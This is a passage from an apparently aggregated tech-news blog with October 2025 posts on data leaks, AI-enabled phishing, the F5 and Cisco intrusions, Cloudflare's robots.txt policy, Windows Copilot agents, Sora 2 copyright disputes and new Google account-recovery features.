The 40 billion records contained "copious amounts of email addresses, message subjects, and more," as well as banking and healthcare notices, including "partial account numbers and specific information" deemed as too sensitive to be exposed publicly. Fowler says he "saw numerous records marked as confidential" while scouring the database.

Fowler says the database lacked password protection and encryption of any sort, meaning anyone who stumbled on (or was tipped off to) the database could freely browse its contents.

Upon discovering the security faux pas, Fowler contacted Netcore, as much of the information he found was connected to the company. Fowler says that access to the open database was restricted on the same day he sent the notice.

It's important to point out that it remains unclear if Netcore itself was managing the database or if the task was farmed out to a third party. Fowler also has no idea how long the unencrypted information was on the web, or if anyone else had accessed it before he tipped off Netcore.

More specifically, "AI-automated phishing emails achieved 54% click-through rates compared to 12% for standard attempts" because "AI enables more targeted phishing and better phishing lures." The bulk of the data from the report is collected from Microsoft's fiscal year 2025, from July 1, 2024 to June 30, 2025.

In addition, "AI automation has the potential to increase phishing profitability by up to 50 times by scaling highly targeted attacks to thousands of targets at minimal cost. This massive return on investment will incentivise cyber threat actors who aren’t yet using AI to add it to their toolbox in the future."

Phishing is the attempt to trick people into clicking malicious links or downloading malicious files by pretending to be legitimate. For instance, it might be an email pretending to be from your employer, trying to get you to download an infected file that's disguised as an innocent presentation or spreadsheet. Or it might send you to a website that will ask for your details.

Microsoft explains that AI can "automate phishing campaigns, generate deepfakes, and craft highly convincing fraudulent messages." That makes sense because AI has developed enough that it can craft exploits and attacks that a very intelligent and knowledgeable bad actor could.

(Image credit: seksan Mongkhonkhamsao @ Getty Images)

These phishing stats just point towards a more general—and, of course, expected—trend towards AI being used for nefarious purposes, not just for phishing:

"We’re witnessing adversaries deploy generative AI for a variety of activities, including scaling social engineering, automating lateral movement, engaging in vulnerability discovery, and even real-time evasion of security controls. Autonomous malware and AI-powered agents are now capable of adapting their tactics on the fly, challenging defenders to move beyond static detection and embrace behavior-based, anticipatory defense."

It can be easy to jump on the anti-AI bandwagon upon hearing things like this—and I'm no stranger to such sentiment—but I'm conscious that I'm hearing about this on the same day I'm hearing that AI has discovered a promising new cancer treatment method. Pros and cons, as always.

Plus, there's the fact that AI is used to help defend from cyber attacks these days. I suppose that's just what happens in an arms race, though; the neorealist in me sees such tit-for-tat escalations as inevitable to maintain equilibrium between different states and powers.

The good news is that it doesn't seem there's much different, in principle, that we should be doing—just ramping up more of the same. For instance, Microsoft says that "no matter how much the cyber threat landscape changes, multifactor authentication (MFA) still blocks over 99% of unauthorized access attempts, making it the single most important security measure an organization can implement."

Of course, MFA might do little to prevent you from falling for a phishing attack. On that front, though, Microsoft's recommendations are again more and better implementations of the same defences we're used to: Inbox filters, restrictions on external communications, limiting remote access tools, educating users, and keeping an eye out for common patterns of attack behaviours.

Source

Thousands of networks—many of them operated by the US government and Fortune 500 companies—face an “imminent threat” of being breached by a nation-state hacking group following the breach of a major maker of software, the federal government warned on Wednesday.

F5, a Seattle-based maker of networking software, disclosed the breach on Wednesday. F5 said a “sophisticated” threat group working for an undisclosed nation-state government had surreptitiously and persistently dwelled in its network over a “long term.” Security researchers who have responded to similar intrusions in the past took the language to mean the hackers were inside the F5 network for years.

Unprecedented

During that time, F5 said, the hackers took control of the network segment the company uses to create and distribute updates for BIG IP, a line of server appliances that F5 says is used by 48 of the world’s top 50 corporations. Wednesday’s disclosure went on to say the threat group downloaded proprietary BIG-IP source code information about vulnerabilities that had been privately discovered but not yet patched. The hackers also obtained configuration settings that some customers used inside their networks.

Control of the build system and access to the source code, customer configurations, and documentation of unpatched vulnerabilities has the potential to give the hackers unprecedented knowledge of weaknesses and the ability to exploit them in supply-chain attacks on thousands of networks, many of which are sensitive. The theft of customer configurations and other data further raises the risk that sensitive credentials can be abused, F5 and outside security experts said.

Customers position BIG-IP at the very edge of their networks for use as load balancers and firewalls, and for inspection and encryption of data passing into and out of networks. Given BIG-IP's network position and its role in managing traffic for web servers, previous compromises have allowed adversaries to expand their access to other parts of an infected network.

F5 said that investigations by two outside intrusion-response firms have yet to find any evidence of supply-chain attacks. The company attached letters from firms IOActive and NCC Group attesting that analyses of source code and build pipeline uncovered no signs that a “threat actor modified or introduced any vulnerabilities into the in-scope items." The firms also said they didn’t identify any evidence of critical vulnerabilities in the system. Investigators, which also included Mandiant and CrowdStrike, found no evidence that data from its CRM, financial, support case management, or health systems was accessed.

The company released updates for its BIG-IP, F5OS, BIG-IQ, and APM products. CVE designations and other details are here. Two days ago, F5 rotated BIG-IP signing certificates, though there was no immediate confirmation that the move is in response to the breach.

The US Cybersecurity and Infrastructure Security agency has warned that federal agencies that rely on the appliance face an “imminent threat” from the thefts, which “pose an unacceptable risk.” The agency went on to direct federal agencies under its control to take “emergency action.” The UK’s National Cyber Security Center issued a similar directive.

CISA has ordered all federal agencies it oversees to immediately take inventory of all BIG-IP devices in networks they run or in networks that outside providers run on their behalf. The agency went on to direct agencies to install the updates and follow a threat-hunting guide that F5 has also issued. BIG-IP users in private industry should do the same.

This story originally appeared on Ars Technica.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Friday 17 October 2025 at 12:51 pm AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of September): 4,533

RIP Matrix

Mozilla has cooked up a new way to keep your browser habits safe from spying eyes: Firefox VPN. The latest Firefox VPN is currently in a Beta stage for testing, and Mozilla says that it's only available for a limited time to randomly selected users (via TechRadar).

Firefox VPN is a free addition to the web browser, and the wording in the Mozilla support document suggests that it will remain free after the testing period. Firefox has not placed any data limits, at least during the testing period.

Firefox VPN is designed to work within the Firefox browser only. Any web traffic that originates in the browser is directed through VPN servers managed by Firefox; any other web traffic originating elsewhere is not protected.

Mozilla says it works by "concealing your real IP as well as adding a layer of encryption to your communications" on the official Firefox VPN support page. Sounds like a standard VPN, albeit with limited scope.

Because the new VPN built into Firefox is invite-only while it's being tested, not everyone will get to give it a try. If you're one of the lucky users who is selected for testing, you'll see a prompt pop up when you launch Firefox asking if you'd like to try Firefox VPN.

If you don't see the prompt, well, you're out of luck for now.

This is Mozilla's second VPN to enter the market

A lot of Firefox users wondered why Mozilla called its first VPN "Mozilla VPN" and not "Firefox VPN" when it launched a few years ago. They now have an answer.

Yes, this is Mozilla's second VPN to enter the market. Mozilla VPN officially launched in 2020 following the retirement/rebranding of Firefox Private Network.

Mozilla VPN is a full-fledged VPN service that covers your entire PC or device, not just your data in Firefox. Mozilla VPN has a standalone app available for Windows 10 and Windows 11, as well as plenty of other devices.

As with most VPN services that cover all of your web traffic, Mozilla VPN is not free. You can subscribe on a monthly or yearly basis, and the lowest price you'll get is about $4.99 per month when you subscribe for a full year.

Not bad, especially as it allows you to use up to five devices under the same account.

But for those who don't want to pay a monthly subscription fee, Firefox VPN should be a tempting feature once it arrives (hopefully for free) for all Firefox users.

A free VPN? I thought I was supposed to avoid those...

It could be a consequential act of quiet regulation. Cloudflare, a web infrastructure company, has updated millions of websites' robots.txt files in an effort to force Google to change how it crawls them to fuel its AI products and initiatives.

We spoke with Cloudflare CEO Matthew Prince about what exactly is going on here, why it matters, and what the web might soon look like. But to get into that, we need to cover a little background first.

The new change, which Cloudflare calls its Content Signals Policy, happened after publishers and other companies that depend on web traffic have cried foul over Google's AI Overviews and similar AI answer engines, saying they are sharply cutting those companies' path to revenue because they don't send traffic back to the source of the information.

There have been lawsuits, efforts to kick-start new marketplaces to ensure compensation, and more—but few companies have the kind of leverage Cloudflare does. Its products and services back something close to 20 percent of the web, and thus a significant slice of the websites that show up on search results pages or that fuel large language models.

"Almost every reasonable AI company that's out there is saying, listen, if it's a fair playing field, then we're happy to pay for content," Prince said. "The problem is that all of them are terrified of Google because if Google gets content for free but they all have to pay for it, they are always going to be at an inherent disadvantage."

This is happening because Google is using its dominant position in search to ensure that web publishers allow their content to be used in ways that they might not otherwise want it to.

The changing norms of the web

Since 2023, Google has offered a way for website administrators to opt their content out of use for training Google's large language models, such as Gemini.

However, allowing pages to be indexed by Google's search crawlers and shown in results requires accepting that they'll also be used to generate AI Overviews at the top of results pages through a process called retrieval-augmented generation (RAG).

That's not so for many other crawlers, making Google an outlier among major players.

This is a sore point for a wide range of website administrators, from news websites that publish journalism to investment banks that produce research reports.

A July study from the Pew Research Center analyzed data from 900 adults in the US and found that AI Overviews cut referrals nearly in half. Specifically, users clicked a link on a page with AI Overviews at the top just 8 percent of the time, compared to 15 percent for search engine results pages without those summaries.

And a report in The Wall Street Journal cited a wide range of sources—including internal traffic metrics from numerous major publications like The New York Times and Business Insider—to describe industry-wide plummets in website traffic that those publishers said were tied to AI summaries, leading to layoffs and strategic shifts.

In August, Google's head of search, Liz Reid, disputed the validity and applicability of studies and publisher reports of reduced link clicks in search. "Overall, total organic click volume from Google Search to websites has been relatively stable year-over-year," she wrote, going on to say that reports of big declines were "often based on flawed methodologies, isolated examples, or traffic changes that occurred prior to the rollout of AI features in Search."

Publishers aren't convinced. Penske Media Corporation, which owns brands like The Hollywood Reporter and Rolling Stone, sued Google over AI Overviews in September. The suit claims that affiliate link revenue has dropped by more than a third in the past year, due in large part to Google's overviews—a threatening shortfall in a business that already has difficult margins.

Penske's suit specifically noted that because Google bundles traditional search engine indexing and RAG use together, the company has no choice but to allow Google to keep summarizing its articles, as cutting off Google search referrals entirely would be financially fatal.

Since the earliest days of digital publishing, referrals have in one way or another acted as the backbone of the web's economy. Content could be made available freely to both human readers and crawlers, and norms were applied across the web to allow information to be tracked back to its source and give that source an opportunity to monetize its content to sustain itself.

Today, there's a panic that the old system isn't working anymore as content summaries via RAG have become more common, and along with other players, Cloudflare is trying to update those norms to reflect the current reality.

A mass-scale update to robots.txt

Announced on September 24, Cloudflare's Content Signals Policy is an effort to use the company's influential market position to change how content is used by web crawlers. It involves updating millions of websites' robots.txt files.

Starting in 1994, websites began placing a file called "robots.txt" at the domain root to indicate to automated web crawlers which parts of the domain should be crawled and indexed and which should be ignored. The standard became near-universal over the years; honoring it has been a key part of how Google's web crawlers operate.

Historically, robots.txt simply includes a list of paths on the domain that were flagged as either "allow" or "disallow." It was technically not enforceable, but it became an effective honor system because there are advantages to it for the owners of both the website and the crawler: Website owners could dictate access for various business reasons, and it helped crawlers avoid working through data that wouldn't be relevant.

But robots.txt only tells crawlers whether they can access something at all; it doesn't tell them what they can use it for. For example, Google supports disallowing the agent "Google-Extended" as a path to blocking crawlers that are looking for content with which to train future versions of its Gemini large language model—though introducing that rule doesn't do anything about the training Google did before it rolled out Google-Extended in 2023, and it doesn't stop crawling for RAG and AI Overviews.

The Content Signals Policy initiative is a newly proposed format for robots.txt that intends to do that. It allows website operators to opt in or out of consenting to the following use cases, as worded in the policy:

• search: Building a search index and providing search results (e.g., returning hyperlinks and short excerpts from your website's contents). Search does not include providing AI-generated search summaries.
• ai-input: Inputting content into one or more AI models (e.g., retrieval augmented generation, grounding, or other real-time taking of content for generative AI search answers).
• ai-train: Training or fine-tuning AI models.

Cloudflare has given all of its customers quick paths for setting those values on a case-by-case basis. Further, it has automatically updated robots.txt on the 3.8 million domains that already use Cloudflare's managed robots.txt feature, with search defaulting to yes, ai-train to no, and ai-input blank, indicating a neutral position.

The threat of potential litigation

In making this look a bit like a terms of service agreement, Cloudflare's goal is explicitly to put legal pressure on Google to change its policy of bundling traditional search crawlers and AI Overviews.

"Make no mistake, the legal team at Google is looking at this saying, 'Huh, that's now something that we have to actively choose to ignore across a significant portion of the web,'" Prince told me.

He further characterized this as an effort to get a company that he says has historically been "largely a good actor" and a "patron of the web" to go back to doing the right thing.

"Inside of Google, there is a fight where there are people who are saying we should change how we're doing this," he explained. "And there are other people saying, no, that gives up our inherent advantage, we have a God-given right to all the content on the Internet."

Amid that debate, lawyers have sway at Google, so Cloudflare tried to design tools "that made it very clear that if they were going to follow any of these sites, there was a clear license which was in place for them. And that will create risk for them if they don't follow it," Prince said.

The next web paradigm

It takes a company with Cloudflare's scale to do something like this with any hope that it will have an impact. If just a few websites made this change, Google would have an easier time ignoring it, or worse yet, it could simply stop crawling them to avoid the problem. Since Cloudflare is entangled with millions of websites, Google couldn't do that without materially impacting the quality of the search experience.

Cloudflare has a vested interest in the general health of the web, but there are other strategic considerations at play, too. The company has been working on tools to assist with RAG on customers' websites in partnership with Microsoft-owned Google competitor Bing and has experimented with a marketplace that provides a way for websites to charge crawlers for scraping the sites for AI, though what final form that might take is still unclear.

I asked Prince directly if this comes from a place of conviction. "There are very few times that opportunities come along where you get to help think through what a future better business model of an organization or institution as large as the Internet and as important as the Internet is," he said. "As we do that, I think that we should all be thinking about what have we learned that was good about the Internet in the past and what have we learned that was bad about the Internet in the past."

It's important to acknowledge that we don't yet know what the future business model of the web will look like. Cloudflare itself has ideas. Others have proposed new standards, marketplaces, and strategies, too. There will be winners and losers, and those won't always be the same winners and losers we saw in the previous paradigm.

What most people seem to agree on, whatever their individual incentives, is that Google shouldn't get to come out on top in a future answer-engine-driven web paradigm just because it previously established dominance in the search-engine-driven one.

For this new standard for robots.txt, success looks like Google allowing content to be available in search but not in AI Overviews. Whatever the long-term vision, and whether it happens because of Cloudflare's pressure with the Content Signals Policy or some other driving force, most agree that it would be a good start.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Friday 17 October 2025 at 3:59 am AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of September): 4,533

RIP Matrix

ZDNET's key takeaways

•   Windows 11 is adding agents that can take actions on your behalf.
•   Copilot agents represent potential security and privacy risks.
•   Expect testing and more security controls before the feature goes public.

Every computer security decision ultimately comes down to a question of trust. Should you install this program you're about to download from an unfamiliar website? Are you certain that your email messages are going directly to their recipient without being intercepted? Is it safe to provide that merchant with your credit card details?

Soon, owners of PCs running Windows 11 will have another question to add to that list: Should you trust this Copilot agent to poke around in your files and interact with apps on your behalf?

Here's how Microsoft describes the Copilot Actions feature, which is rolling out for testing by members of the Windows Insider Program:

Copilot Actions is an AI agent that completes tasks for you by interacting with your apps and files, using vision and advanced reasoning to click, type, and scroll like a human would.

This transforms agents from passive assistants into active digital collaborators that can carry out complex tasks for you to enhance efficiency and productivity -- like updating documents, organizing files, booking tickets, or sending emails. After you've granted the agent access, when integrated with Windows, the agent can take advantage of what you already have on your PC, like your apps and data, to complete tasks for you.

These are pretty big trust decisions. Allowing an agent to interact with your personal files requires a leap of faith. So does the idea of letting an agent act on your behalf in apps -- where, presumably, you are signed in using some sort of secure credentials.

Learning from the past

The last time Microsoft rolled out a major AI feature with this level of access to your personal data, it ... didn't go well. The Windows Recall feature was slammed by security researchers, delayed for months, and finally relaunched with major privacy and security changes. Ultimately, it was nearly a year before the feature made it to public builds.

This time around, Microsoft is taking no such chances. In a pair of on-the-record briefings ahead of the public debut of the Copilot Actions feature, executives at the company went to great pains to emphasize its commitment to privacy and security controls.

For starters, the feature is rolling out as a preview, in "experimental mode," exclusively for customers who've opted into the Windows Insider Program for pre-release builds of Windows.

The feature will be disabled by default and will only be enabled when the user flips the "Experimental agentic features" switch in Windows Settings > System > AI components > Agent tools.

Source

The activity, codenamed Operation Zero Disco by Trend Micro, involves the weaponization of CVE-2025-20352 (CVSS score: 7.7), a stack overflow vulnerability in the Simple Network Management Protocol (SNMP) subsystem that could allow an authenticated, remote attacker to execute arbitrary code by sending crafted SNMP packets to a susceptible device. The intrusions have not been attributed to any known threat actor or group.

The shortcoming was patched by Cisco late last month, but not before it was exploited as a zero-day in real-world attacks.

"The operation primarily impacted Cisco 9400, 9300, and legacy 3750G series devices, with additional attempts to exploit a modified Telnet vulnerability (based on CVE-2017-3881) to enable memory access," researchers Dove Chiu and Lucien Chuang said.

The cybersecurity company also noted that the rootkits allowed attackers to achieve remote code execution and gain persistent unauthorized access by setting universal passwords and installing hooks into the Cisco IOS daemon (IOSd) memory space. IOSd is run as a software process within the Linux kernel.

Another notable aspect of the attacks is that they singled out victims running older Linux systems that do not have endpoint detection response solutions enabled, making it possible to deploy the rootkits in order to fly under the radar. In addition, the adversary is said to have used spoofed IPs and Mac email addresses in their intrusions.

Besides CVE-2025-20352, the threat actors have also been observed attempting to exploit a Telnet vulnerability that is a modified version of CVE-2017-3881 so as to allow memory read/write at arbitrary addresses. However, the exact nature of the functionality remains unclear.

The name "Zero Disco" is a reference to the fact that the implanted rootkit sets a universal password that includes the word "disco" in it -- a one-letter change from "Cisco."

"The malware then installs several hooks onto the IOSd, which results in fileless components disappearing after a reboot," the researchers noted. "Newer switch models provide some protection via Address Space Layout Randomization (ASLR), which reduces the success rate of intrusion attempts; however, it should be noted that repeated attempts can still succeed."

Source

Google has announced new safety features for Google Messages to help users dodge potential scam attacks and spot them before it's too late. For starters, Google Messages now prevents users from visiting links inside messages suspected of being scams.

The feature is rolling out to all users globally, giving them the option to mark a message as "not spam" if it's flagged by mistake.

Android has got a new Key Verifier tool, which is making its way to Google Messages. It's a system service designed to protect users from fraudsters and impersonators. They can scan a QR code for their trusted contacts to verify their public key for end-to-end encrypted messages.

In Google Messages, select a contact you want to verify. Tap on their name at the top of the chat screen, then go to Details > Verify keys and follow the steps. Key Verifier is rolling out to all users running Android 10 and later versions.

The search giant said that "widespread access to cutting-edge technology is making scams more convincing and nefarious than ever before," adding that about 60% of people globally have experienced some kind of scam in the last year.

Users can play Google's educational game Be Scam Ready, which is based on the inoculation theory, to expose themselves to simulations of real-life scam and fraud situations.

Apart from that, Google is also rolling out a couple of recovery features for situations when people get locked out of their account or someone else gains access to it. They can now set up Recovery Contacts, allowing their friends and family members to assist in the account recovery process.

If their primary phone gets stolen or broken, people can use their phone number to regain access. A new Android feature called "Sign in with Mobile Number" automatically identifies users' linked accounts after they type in their phone number.

The account details are verified after the user enters the lock screen password from their previous device for verification. The feature doesn't require users to know their Google account password; it will gradually roll out to all users worldwide.

October is Cybersecurity Awareness Month in the US. Google said it will host in-person scam and fraud workshops at Google Store locations in New York City and Mountain View on October 21 and 28, respectively.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Thursday 16 October 2025 at 12:32 pm AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of September): 4,533

RIP Matrix

They also discovered its knack for generating images in the distinctive art style of Japanese animation studio, Studio Ghibli, the makers of My Neighbor Totoro and Spirited Away.

Obviously, that initial launch drew controversy over copyright concerns. Those concerns were only heightened when OpenAI released Sora 2 about two weeks ago, on October 1.

Sora 2 is capable of creating 20-second-long 1080p videos with sound. And just like with the launch of 4o Image Generation, the internet was flooded with AI creations. This time, users generated videos with characters from prominent franchises such as Pokémon (including Pikachu), Mario, One Piece, and Demon Slayer.

This has led Japan's government to step in and call out OpenAI. According to IGN, Japan wants the company to stop ripping off its "irreplaceable treasures" like manga and anime. At a press conference last Friday, Minoru Kiuchi, the minister of state for IP and AI strategy, told reporters that the Cabinet Office made a formal online request for OpenAI to refrain from infringing on Japanese IPs.

Days before the press conference, Akihisa Shiozaki, the deputy Secretary-General of Japan's ruling party, LDP, threatened to invoke Article 16 of the AI Promotion Act if the situation did not improve. He posted that the government should consider using its investigative powers to request an explanation of Sora 2's basic specifications, its filtering measures, and its track record of deletion responses.

Shiozaki, in a separate X post (translated), noted that Sora 2 refuses to generate characters owned by U.S. entertainment giants, like Disney:

When I tried inputting prompts into Sora2 myself, it generated footage of popular anime characters with a quality indistinguishable from the originals, one after another. Yet, for some reason, characters owned by major U.S. companies, like Mickey Mouse or Superman, didn't appear.

 

This was clearly an imbalance and potentially a serious issue under copyright law. The efforts and sensibilities of Japanese creators, who have led the world, were at risk of being disregarded.

Japan's AI Promotion Act, fully enacted on September 1, 2025, aims to make the country the most "AI-friendly country" in the world. The legislation favors cooperation over harsh penalties, a different path from the EU's stricter regulations.

Article 16 of the act grants the government investigative powers, with which it can analyze cases where AI infringes on citizens' rights and then consider countermeasures. These powers do not include fines, but the government can publicly name companies that fail to cooperate.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Thursday 16 October 2025 at 12:31 pm AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of September): 4,533

RIP Matrix

Google has announced a new safety feature for securing user accounts. If you can't sign in to your account, you can now ask friends and family to help you regain access to your account.

There are multiple ways to recover access to a Google account such as resetting the password, getting a one-time code via SMS, using an alternative email address connected to the account, or by using backup codes, etc.

Now, you can now recover your account in a new way. Let's say someone has forgotten their password, or their phone, or the device that had their passkey or 2FA authenticator, email client, etc. They can't receive a text to sign in, or use alternate methods immediately. Recovery Contacts is Google's answer to this problem. You simply add a trusted contact, like a close friend or a family member, to your account. It's important to note that the contact will need to have a Google account. That should be fairly obvious, but I think it's better to mention it. Don't confuse this with a recovery email address, that's different, as you own both accounts.

Setting up Recovery Contacts is simple, go to your Google account's Security and Sign-in page, at https://myaccount.google.com/security. You should see an option that says "Recovery Contacts". Click on it.

Or you can directly go to g.co/recovery-contacts and click on "Add recovery contact". This opens a pop-up, which is populated with some suggested email addresses belonging to your friends or family.

Select the contact, hit continue, and it should prompt you whether you want to send a recovery contact request. This will send a mail to the selected contact, and they will be able to view your name, email address and profile photo. I mean, if you trust someone, they probably already have all these details, right? Hit the send request button, and it will tell you the contact has been sent a request, and that they will need to confirm the request within 7 days. You will also receive an email stating that you have sent a contact request.

The Recovery Contacts page will list your open requests. In case you changed your mind, you can cancel the request, or remove a contact from the Recovery Contacts list. This is also where you can choose to accept or decline requests that people have sent you.

Google's announcement says that in case of an emergency, and you're locked out of your account, you can choose to sign in using a Recovery Contact. You will need to send a code to them (that you get from Google), which the contact can use to verify it's a legitimate request, and approve the sign in attempt. Pretty cool!

Here is the official support page for Google Recovery Contacts if you need more details.

Recovery Contacts are rolling out to users slowly. I think this is a good feature, it may be useful for everyone, but especially for elderly people, or those who aren't tech-savvy, and may need assistance with recovering their account.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Thursday 16 October 2025 at 3:38 am AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of September): 4,533

RIP Matrix